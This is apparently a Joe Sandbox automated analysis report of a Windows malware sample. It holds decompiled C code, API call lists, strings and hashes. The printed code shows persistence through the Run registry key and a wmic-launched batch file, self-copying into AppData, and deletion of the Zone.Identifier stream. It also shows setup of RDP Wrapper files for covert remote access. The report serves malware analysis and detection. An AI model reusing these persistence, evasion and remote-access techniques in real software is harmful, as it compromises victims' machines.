                                                                    				intOrPtr _t143;
                                                                    
                                                                    				_v1600 = 0xa;
                                                                    				_v1592 = 0;
                                                                    				E02D15BF1( &_v1580);
                                                                    				E02D21638( &_v1500);
                                                                    				E02D110AD(GetTickCount());
                                                                    				_v1632 = 0x104;
                                                                    				GetModuleFileNameA(0,  &_v1372, _t127);
                                                                    				_v1608 = 0;
                                                                    				_t56 = E02D21E21( &_v1372,  &_v1608); // executed
                                                                    				_t126 = _v1608;
                                                                    				if(_v1608 == 0) {
                                                                    					L20:
                                                                    					E02D210D7( &_v1500);
                                                                    					E02D15C16( &_v1580, _t127);
                                                                    					return 0;
                                                                    				} else {
                                                                    					_v1604 = 0;
                                                                    					E02D21BF8(_t56, _t126, 0x215a,  &_v1604);
                                                                    					_t131 = 0x20;
                                                                    					_t127 = E02D11085(_t131);
                                                                    					_t114 = _t127;
                                                                    					do {
                                                                    						 *_t114 = 0;
                                                                    						_t114 =  &(_t114[1]);
                                                                    						_t131 = _t131 - 1;
                                                                    					} while (_t131 != 0);
                                                                    					E02D1102C(_t127,  &_v1604, 4);
                                                                    					 *0x2d298b8 = CreateEventA(0, 0, 0, _t127);
                                                                    					if(GetLastError() == 0xb7) {
                                                                    						goto L20;
                                                                    					}
                                                                    					_t143 =  *0x2d298b8; // 0x34c
                                                                    					if(_t143 == 0) {
                                                                    						goto L20;
                                                                    					}
                                                                    					RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, 0, 0, 0xf003f, 0,  &_v1612,  &_v1592); // executed
                                                                    					RegSetValueExA(_v1612, "MaxConnectionsPer1_0Server", 0, 4,  &_v1600, 4); // executed
                                                                    					RegSetValueExA(_v1612, "MaxConnectionsPerServer", 0, 4,  &_v1600, 4); // executed
                                                                    					RegCloseKey(_v1612);
                                                                    					E02D15A10( &_v1580, _t126, _t143); // executed
                                                                    					E02D214A6( &_v1500, _t126, _t143,  &_v1580); // executed
                                                                    					_t117 =  &_v592;
                                                                    					E02D14EE7( &_v592, _t126, _t143,  &_v1584,  &_v1504); // executed
                                                                    					E02D11052( &_v1120, 0, 0x208);
                                                                    					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v1120); // executed
                                                                    					lstrcatW( &_v1140, L"\\Microsoft Vision\\");
                                                                    					CreateDirectoryW( &_v1140, 0); // executed
                                                                    					if(_v1552 != 0) {
                                                                    						_t100 = E02D1FBFC(); // executed
                                                                    						if(_t100 != 1) {
                                                                    							_t101 = E02D1F51D();
                                                                    							_t146 = _t101 - 0xa;
                                                                    							if(_t101 != 0xa) {
                                                                    								E02D21A3C(0,  &_v592, __eflags);
                                                                    							} else {
                                                                    								E02D21AB9(_t126, _t146);
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					if(_v1536 != 0) {
                                                                    						_t98 = E02D1FBFC(); // executed
                                                                    						_t148 = _t98 - 1;
                                                                    						if(_t98 == 1) {
                                                                    							E02D22FD7(_t117, _t148);
                                                                    						}
                                                                    					}
                                                                    					_t149 = _v1484;
                                                                    					if(_v1484 != 0) {
                                                                    						L16:
                                                                    						__eflags = _v1544;
                                                                    						if(__eflags != 0) {
                                                                    							E02D21F13();
                                                                    						}
                                                                    						E02D14E5B( &_v608, _t126, __eflags);
                                                                    						goto L19;
                                                                    					} else {
                                                                    						E02D21136( &_v1520, _t149, _v1576, _v1568, _v1532); // executed
                                                                    						_t150 = _v1588;
                                                                    						if(_v1588 == 0) {
                                                                    							goto L16;
                                                                    						}
                                                                    						_v1608 = 0;
                                                                    						_t121 =  &_v1616;
                                                                    						E02D1362D(_t121,  &_v1488); // executed
                                                                    						_push(_t121);
                                                                    						E02D20BD9( &_v1608, _t150,  &_v1620,  &_v1612); // executed
                                                                    						E02D15EA5(_v1632);
                                                                    						E02D15EA5(0);
                                                                    						L19:
                                                                    						E02D14BC0( &_v608, _t127, _t150);
                                                                    						goto L20;
                                                                    					}
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 02D23489
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 02D234A5
                                                                      • Part of subcall function 02D21E21: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E4E
                                                                      • Part of subcall function 02D21E21: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E61
                                                                      • Part of subcall function 02D21E21: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E72
                                                                      • Part of subcall function 02D21E21: FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E7F
                                                                      • Part of subcall function 02D11085: GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
                                                                      • Part of subcall function 02D11085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D2350C
                                                                    • GetLastError.KERNEL32 ref: 02D23517
                                                                    • RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 02D23551
                                                                    • RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 02D23570
                                                                    • RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 02D23585
                                                                    • RegCloseKey.ADVAPI32(?), ref: 02D2358B
                                                                    • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?), ref: 02D235E7
                                                                    • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 02D235FA
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 02D23609
                                                                      • Part of subcall function 02D21A3C: GetModuleFileNameW.KERNEL32(00000000,02E5CBF0,00000208,00000000,00000000,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A58
                                                                      • Part of subcall function 02D21A3C: IsUserAnAdmin.SHELL32 ref: 02D21A5E
                                                                      • Part of subcall function 02D21A3C: FindResourceW.KERNEL32(00000000,00000066,WM_DSP,?,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A87
                                                                      • Part of subcall function 02D21A3C: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,02D157B9,?,00000000,00000000,?,?,?,?,?,?), ref: 02D21A91
                                                                      • Part of subcall function 02D21A3C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,02D157B9,?,00000000,00000000,?,?,?,?,?,?), ref: 02D21A9B
                                                                      • Part of subcall function 02D21A3C: LockResource.KERNEL32(00000000,?,?,?,?,02D157B9,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 02D21AA2
                                                                      • Part of subcall function 02D21136: CopyFileW.KERNEL32(?,?,00000000,?,02D24684,?,00000000,?,?,?,?,00000000,745D0770,00000000), ref: 02D211D7
                                                                      • Part of subcall function 02D1362D: lstrcpyW.KERNEL32 ref: 02D13657
                                                                      • Part of subcall function 02D20BD9: CreateProcessW.KERNEL32 ref: 02D20C14
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Strings
                                                                    • \Microsoft Vision\, xrefs: 02D235ED
                                                                    • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 02D23547
                                                                    • MaxConnectionsPerServer, xrefs: 02D2357C
                                                                    • MaxConnectionsPer1_0Server, xrefs: 02D23567
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Create$Resource$CloseFindHeapModuleNameProcessValue$AdminAllocateChangeCopyCountDirectoryErrorEventFolderFreeLastLoadLockNotificationPathReadSizeSizeofTickUserVirtuallstrcatlstrcpy
                                                                    • String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
                                                                    • API String ID: 3977721202-2552559493
                                                                    • Opcode ID: 59aa34a6267814967c2ca466bcf2744150c967be7c9fdb581054d617e96aef4c
                                                                    • Instruction ID: d42d083c8179f2fa62f1a2616d1f53e57371715cd185794014e8ad5f04518096
                                                                    • Opcode Fuzzy Hash: 59aa34a6267814967c2ca466bcf2744150c967be7c9fdb581054d617e96aef4c
                                                                    • Instruction Fuzzy Hash: 0F614FB1444394AFD720EB60E884EABB7ADEFA4709F00492DF68592250DB349D4CCF62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0054C04C,00000FA0,?,?,004073AC), ref: 004073DA
                                                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,004073AC), ref: 004073E5
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,004073AC), ref: 004073F6
                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00407408
                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00407416
                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,004073AC), ref: 00407439
                                                                    • RtlDeleteCriticalSection.NTDLL(0054C04C), ref: 00407455
                                                                    • CloseHandle.KERNEL32(00000000,?,?,004073AC), ref: 00407465
                                                                    Strings
                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 004073E0
                                                                    • WakeAllConditionVariable, xrefs: 0040740E
                                                                    • kernel32.dll, xrefs: 004073F1
                                                                    • SleepConditionVariableCS, xrefs: 00407402
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                    • API String ID: 2565136772-3242537097
                                                                    • Opcode ID: 47bab8a6c0b3375a39d6aa0030a1c0f25a48bd971caaa7ad25551b5adff7caf2
                                                                    • Instruction ID: a3fc7ea5def126fc8579fda3970e1067efdb3e252d3ae04e5338d1b1bab15f84
                                                                    • Opcode Fuzzy Hash: 47bab8a6c0b3375a39d6aa0030a1c0f25a48bd971caaa7ad25551b5adff7caf2
                                                                    • Instruction Fuzzy Hash: 46012871E85701ABD7611B74AC0DEDB3E58EF81B00714817EFD09E3290DEB8D800966D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 96%
                                                                    			E02D21136(intOrPtr* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8, void* _a12) {
                                                                    				void* _v12;
                                                                    				char _v16;
                                                                    				WCHAR* _v20;
                                                                    				WCHAR* _v24;
                                                                    				char _v28;
                                                                    				char _v32;
                                                                    				char _v36;
                                                                    				intOrPtr* _v40;
                                                                    				char _v44;
                                                                    				char _v48;
                                                                    				void* _t90;
                                                                    				WCHAR* _t102;
                                                                    				WCHAR* _t108;
                                                                    				void* _t117;
                                                                    				void* _t118;
                                                                    				intOrPtr* _t121;
                                                                    				intOrPtr* _t123;
                                                                    				void* _t131;
                                                                    				intOrPtr* _t135;
                                                                    				intOrPtr* _t137;
                                                                    				void* _t138;
                                                                    				int _t142;
                                                                    				void* _t151;
                                                                    				void* _t157;
                                                                    				int _t160;
                                                                    				intOrPtr* _t169;
                                                                    				char* _t173;
                                                                    				WCHAR* _t180;
                                                                    				intOrPtr _t217;
                                                                    				int _t243;
                                                                    				WCHAR* _t254;
                                                                    				WCHAR** _t255;
                                                                    				char** _t256;
                                                                    				void* _t257;
                                                                    
                                                                    				_t257 = __eflags;
                                                                    				_t169 = __ecx;
                                                                    				_v40 = __ecx;
                                                                    				E02D1F481(); // executed
                                                                    				_t239 = 0xa;
                                                                    				_t173 =  &_v48;
                                                                    				E02D134A7(_t173, _t239, _t257); // executed
                                                                    				_push(_t173);
                                                                    				_push(_t173);
                                                                    				_t90 = E02D20F6E(__ecx, _t173, __ecx + 0x10); // executed
                                                                    				E02D20FAE(__ecx);
                                                                    				_t243 = 0;
                                                                    				if(_t90 == 0) {
                                                                    					L4:
                                                                    					_t250 = _t169 + 0x10;
                                                                    					goto L5;
                                                                    				} else {
                                                                    					_t259 = _a4;
                                                                    					if(_a4 == 0) {
                                                                    						goto L4;
                                                                    					} else {
                                                                    						_t239 =  *((intOrPtr*)(__ecx + 0xc));
                                                                    						_t255 = __ecx + 0x20;
                                                                    						_t151 = E02D1F76B( &_v24,  *((intOrPtr*)(__ecx + 0xc)), _t259); // executed
                                                                    						E02D13437(_t255, _t151); // executed
                                                                    						E02D1F71F(E02D15EA5(_v24), _t255);
                                                                    						E02D1362D( &_v16, _t169 + 0x4c); // executed
                                                                    						_t157 = E02D1346A(_t255, _t239, _t259, "\\"); // executed
                                                                    						E02D13335(_t157, _t259,  &_v16); // executed
                                                                    						_t232 = _v16;
                                                                    						E02D15EA5(_v16);
                                                                    						_t160 = CopyFileW(_v20,  *_t255, 0); // executed
                                                                    						if(_t160 != 0) {
                                                                    							_t233 = _t255;
                                                                    							E02D13221(_t255, _t239, _t256);
                                                                    							E02D15911(_t169 + 0x30, _t239, _t256);
                                                                    							E02D160AA( &_v36, _t239, _t233, _t233, _t232, _t232);
                                                                    							_t256 =  &(_t256[4]);
                                                                    							_t250 = _t169 + 0x10;
                                                                    							E02D2106C(_t169, 0x80000001, _t169 + 0x10, 0xf003f, 0); // executed
                                                                    							E02D21039(_t169, _t169 + 0x18,  &_v36, 3); // executed
                                                                    							E02D13036( &_v36);
                                                                    							L5:
                                                                    							if( *_t169 == _t243) {
                                                                    								E02D2106C(_t169, 0x80000001, _t250, 0xf003f, _t243);
                                                                    							}
                                                                    							_t262 = _a12 - _t243;
                                                                    							if(_a12 == _t243) {
                                                                    								L11:
                                                                    								__eflags = _a8;
                                                                    								if(__eflags == 0) {
                                                                    									L17:
                                                                    									E02D135E5( &_a4,  *((intOrPtr*)(_t169 + 0x20)));
                                                                    									E02D13335( &_a4, __eflags, E02D135E5( &_a12, L":Zone.Identifier"));
                                                                    									E02D15EA5(_a12);
                                                                    									DeleteFileW(_a4);
                                                                    									_t180 = _a4;
                                                                    									_t243 = 1;
                                                                    									__eflags = 1;
                                                                    									goto L18;
                                                                    								} else {
                                                                    									__eflags = _a4;
                                                                    									if(_a4 == 0) {
                                                                    										E02D13437(_t169 + 0x20,  &_v20);
                                                                    									}
                                                                    									_t102 = E02D2106C(_t169 + 4,  *((intOrPtr*)(_t169 + 8)), _t169 + 0x14, 0x20006, _t243);
                                                                    									__eflags = _t102;
                                                                    									if(_t102 != 0) {
                                                                    										E02D1362D( &_a4, _t169 + 0x54);
                                                                    										_t108 = E02D21039(_t169 + 4,  &_a4, E02D12FDA( &_v44, _t239, _t169 + 0x20), 1);
                                                                    										E02D15EA5(_a4);
                                                                    										E02D13036( &_v44);
                                                                    										__eflags = _t108;
                                                                    										if(_t108 != 0) {
                                                                    											E02D20FAE(_t169 + 4);
                                                                    											goto L17;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							} else {
                                                                    								__imp__SHGetKnownFolderPath(_t243, _t243,  &_v28); // executed
                                                                    								E02D135E5( &_v16, _v28); // executed
                                                                    								E02D1346A( &_v16, _t239, _t262, L"\\programs.bat"); // executed
                                                                    								E02D135E5( &_v12, L"for /F \"usebackq tokens=*\" %%A in (\""); // executed
                                                                    								_t117 = E02D1346A( &_v12, _t239, _t262, _v16); // executed
                                                                    								_t118 = E02D1346A(_t117, _t239, _t262, L":start"); // executed
                                                                    								E02D1346A(_t118, _t239, _t262, L"\") do %%A"); // executed
                                                                    								_t121 = E02D13554( &_v12,  &_v32); // executed
                                                                    								_t123 = E02D13554( &_v16,  &_v24); // executed
                                                                    								E02D21D35( *_t123,  *_t121, E02D13261( &_v12)); // executed
                                                                    								E02D15EA5(_v24);
                                                                    								E02D15EA5(_v32);
                                                                    								_t241 =  *((intOrPtr*)(_t169 + 0xc));
                                                                    								E02D1F76B( &_v24,  *((intOrPtr*)(_t169 + 0xc)), _t262); // executed
                                                                    								 *_t256 = L":ApplicationData"; // executed
                                                                    								E02D1346A( &_v24,  *((intOrPtr*)(_t169 + 0xc)), _t262, 0x2d24550); // executed
                                                                    								E02D135E5( &_a12, L"wmic process call create \'\""); // executed
                                                                    								_t254 = _v24;
                                                                    								_t131 = E02D1346A( &_a12, _t241, _t262, _t254); // executed
                                                                    								E02D1346A(_t131, _t241, _t262, L"\"\'"); // executed
                                                                    								E02D1346A( &_v16, _t241, _t262, L":start"); // executed
                                                                    								_t135 = E02D13554( &_a12,  &_v24); // executed
                                                                    								_t137 = E02D13554( &_v16,  &_v32); // executed
                                                                    								_t138 = E02D13261( &_a12);
                                                                    								_t239 =  *_t135;
                                                                    								E02D21D35( *_t137,  *_t135, _t138); // executed
                                                                    								E02D15EA5(_v32);
                                                                    								E02D15EA5(_v24);
                                                                    								_t243 = 0;
                                                                    								_t142 = CopyFileW(_v20, _t254, 0); // executed
                                                                    								_t217 = _a12;
                                                                    								if(_t142 != 0) {
                                                                    									E02D15EA5(_t217);
                                                                    									_a12 = 0;
                                                                    									E02D15EA5(_t254);
                                                                    									E02D15EA5(_v12);
                                                                    									_v12 = 0;
                                                                    									E02D15EA5(_v16);
                                                                    									_t169 = _v40;
                                                                    									goto L11;
                                                                    								} else {
                                                                    									E02D15EA5(_t217);
                                                                    									_a12 = 0;
                                                                    									E02D15EA5(_t254);
                                                                    									E02D15EA5(_v12);
                                                                    									_t180 = _v16;
                                                                    									_v12 = 0;
                                                                    									L18:
                                                                    									E02D15EA5(_t180);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				E02D15EA5(_v48);
                                                                    				E02D15EA5(_v20);
                                                                    				return _t243;
			}

                                                                    APIs
                                                                      • Part of subcall function 02D1F481: GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,02D235AB,?,02D21618,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 02D1F4A2
                                                                      • Part of subcall function 02D20F6E: RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,745D0770,?,?,02D21165,?,?), ref: 02D20F8E
                                                                      • Part of subcall function 02D20FAE: RegCloseKey.KERNEL32(?,?,02D2112D,?,?,02D236DB), ref: 02D20FB8
                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,02D24684,?,00000000,?,?,?,?,00000000,745D0770,00000000), ref: 02D211D7
                                                                      • Part of subcall function 02D2106C: RegCreateKeyExW.ADVAPI32(745D0770,00000000,00000000,00000000,00000000,02D235AB,00000000,?,?,?,?,02D235AB,?,02D2158B,80000001,?), ref: 02D210A0
                                                                      • Part of subcall function 02D2106C: RegOpenKeyExW.KERNEL32(745D0770,00000000,00000000,02D235AB,?,?,?,02D235AB,?,02D2158B,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 02D210BB
                                                                      • Part of subcall function 02D21039: RegSetValueExW.KERNEL32(?,745D0770,00000000,?,?,?,?,?,02D21432,00000000,00000000,?,00000001,?,?,?), ref: 02D21058
                                                                    • SHGetKnownFolderPath.SHELL32(02D24550,00000000,00000000,?,?,?,?,?,00000000,745D0770,00000000), ref: 02D21264
                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,:start,?,02D27204,wmic process call create '",00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in ("), ref: 02D21382
                                                                      • Part of subcall function 02D1F76B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,00000000,?), ref: 02D1F79C
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D1F71F: SHCreateDirectoryExW.SHELL32(00000000,?,00000000,02D211A6,00000000,?,?,?,?,00000000,745D0770,00000000), ref: 02D1F725
                                                                      • Part of subcall function 02D1362D: lstrcpyW.KERNEL32 ref: 02D13657
                                                                      • Part of subcall function 02D13335: lstrcatW.KERNEL32(00000000,745D0770), ref: 02D13365
                                                                    • DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,00000000,745D0770,00000000), ref: 02D2147C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Create$CopyFolderPathlstrcpy$CloseDeleteDirectoryFreeKnownModuleNameOpenSpecialValueVirtuallstrcat
                                                                    • String ID: ") do %%A$:Zone.Identifier$:start$\programs.bat$for /F "usebackq tokens=*" %%A in ("$wmic process call create '"
                                                                    • API String ID: 2154703971-2016382161
                                                                    • Opcode ID: df519d2a3d250460643bb2c9918077df67c153c4718c069d695799f6234b58c8
                                                                    • Instruction ID: 57ae90a99e7cd1d42dd5f9ba39346c258d312403fb3680b311cf6719443218ba
                                                                    • Opcode Fuzzy Hash: df519d2a3d250460643bb2c9918077df67c153c4718c069d695799f6234b58c8
                                                                    • Instruction Fuzzy Hash: 91A13EB1A00119ABEF15EF60E8919EE777AEFA4704F508059E81667790DF34AE09CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 79%
                                                                    			E02D1E703(void* __ecx, void* __edx) {
                                                                    				char _v8;
                                                                    				char _v12;
                                                                    				intOrPtr* _t11;
                                                                    				void* _t14;
                                                                    				void* _t15;
                                                                    				void* _t19;
                                                                    				void* _t20;
                                                                    				void* _t25;
                                                                    				void* _t33;
                                                                    				void* _t42;
                                                                    				intOrPtr _t43;
                                                                    				void* _t67;
                                                                    				intOrPtr _t71;
                                                                    				void* _t80;
                                                                    
                                                                    				_t67 = __edx;
                                                                    				_push(__ecx);
                                                                    				_push(__ecx);
                                                                    				InitializeCriticalSection(0x2e5e020);
                                                                    				_t71 = 5;
                                                                    				asm("xorps xmm0, xmm0");
                                                                    				 *0x2e5e070 = _t71;
                                                                    				 *0x2e5e068 = _t71;
                                                                    				_t42 = 0x18;
                                                                    				asm("movups [0x2e5e038], xmm0");
                                                                    				 *0x2e5e048 = 0;
                                                                    				asm("movups [0x2e5e050], xmm0");
                                                                    				 *0x2e5e060 = 0;
                                                                    				 *0x2e5e06c = 0;
                                                                    				_t11 = E02D15F53(_t42);
                                                                    				_t82 = _t11;
                                                                    				if(_t11 == 0) {
                                                                    					_t43 = 0;
                                                                    				} else {
                                                                    					 *_t11 = _t71;
                                                                    					_t1 = _t11 + 4; // 0x4
                                                                    					_t43 = _t1;
                                                                    					asm("stosd");
                                                                    					asm("stosd");
                                                                    					asm("stosd");
                                                                    					asm("stosd");
                                                                    					asm("stosd");
                                                                    				}
                                                                    				 *0x2e5e064 = _t43;
                                                                    				 *0x2e5e07c = 0;
                                                                    				 *0x2e5e080 = 0; // executed
                                                                    				E02D132FF(0x2e5e048, _t67, L"TermService"); // executed
                                                                    				E02D132FF(0x2e5e054, _t67, L"%ProgramFiles%"); // executed
                                                                    				_t14 = E02D135E5( &_v12, L"%windir%\\System32"); // executed
                                                                    				_t68 = _t14;
                                                                    				_t15 = E02D131D4( &_v8, _t14, _t82); // executed
                                                                    				E02D13437(0x2e5e060, _t15); // executed
                                                                    				E02D15EA5(_v8);
                                                                    				_v8 = 0;
                                                                    				E02D15EA5(_v12);
                                                                    				_t19 = E02D1FC58(_v12);
                                                                    				_t83 = _t19 - 1;
                                                                    				if(_t19 != 1) {
                                                                    					_t69 = 0x2e5e054;
                                                                    					_t20 = E02D131D4( &_v12, 0x2e5e054, __eflags);
                                                                    					_t80 = 0x2e5e058;
                                                                    					E02D13437(0x2e5e058, _t20);
                                                                    					E02D15EA5(_v12);
                                                                    				} else {
                                                                    					E02D132FF(0x2e5e054, _t68, L"%ProgramW6432%"); // executed
                                                                    					_t69 = 0x2e5e054;
                                                                    					_t33 = E02D131D4( &_v12, 0x2e5e054, _t83); // executed
                                                                    					_t80 = 0x2e5e058;
                                                                    					E02D13437(0x2e5e058, _t33); // executed
                                                                    					E02D15EA5(_v12);
                                                                    					E02D132FF(0x2e5e054, 0x2e5e054, L"%ProgramFiles%"); // executed
                                                                    				}
                                                                    				E02D1346A(_t80, _t69, _t83, L"\\Microsoft DN1"); // executed
                                                                    				E02D1346A(0x2e5e054, _t69, _t83, L"\\Microsoft DN1"); // executed
                                                                    				_t25 = E02D1346A(0x2e5e060, _t69, _t83, L"\\rfxvmt.dll"); // executed
                                                                    				E02D1F71F(_t25, _t80);
                                                                    				E02D13437(0x2e5e05c, _t80); // executed
                                                                    				E02D1346A(0x2e5e05c, _t69, _t83, L"\\rdpwrap.ini"); // executed
                                                                    				E02D1346A(_t80, _t69, _t83, L"\\sqlmap.dll"); // executed
                                                                    				E02D1346A(0x2e5e054, _t69, _t83, L"\\sqlmap.dll"); // executed
                                                                    				return 0x2e5e020;
                                                                    			}

                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(02E5E020), ref: 02D1E710
                                                                      • Part of subcall function 02D15F53: GetProcessHeap.KERNEL32(00000000,000000F4,02D20477,?,745D0770,00000000,02D15A34), ref: 02D15F56
                                                                      • Part of subcall function 02D15F53: HeapAlloc.KERNEL32(00000000), ref: 02D15F5D
                                                                      • Part of subcall function 02D131D4: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 02D13207
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Strings
                                                                    Memory Dump Source
• Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
                                                                    • String ID: %ProgramFiles%$%ProgramW6432%$%windir%\System32$TermService$\Microsoft DN1$\rdpwrap.ini$\rfxvmt.dll$\sqlmap.dll
                                                                    • API String ID: 2811233055-3289620323
                                                                    • Opcode ID: c9d0c52ceeb2ece4af80d2a752e57d3045f533b3a738838535b569a1aa2775ae
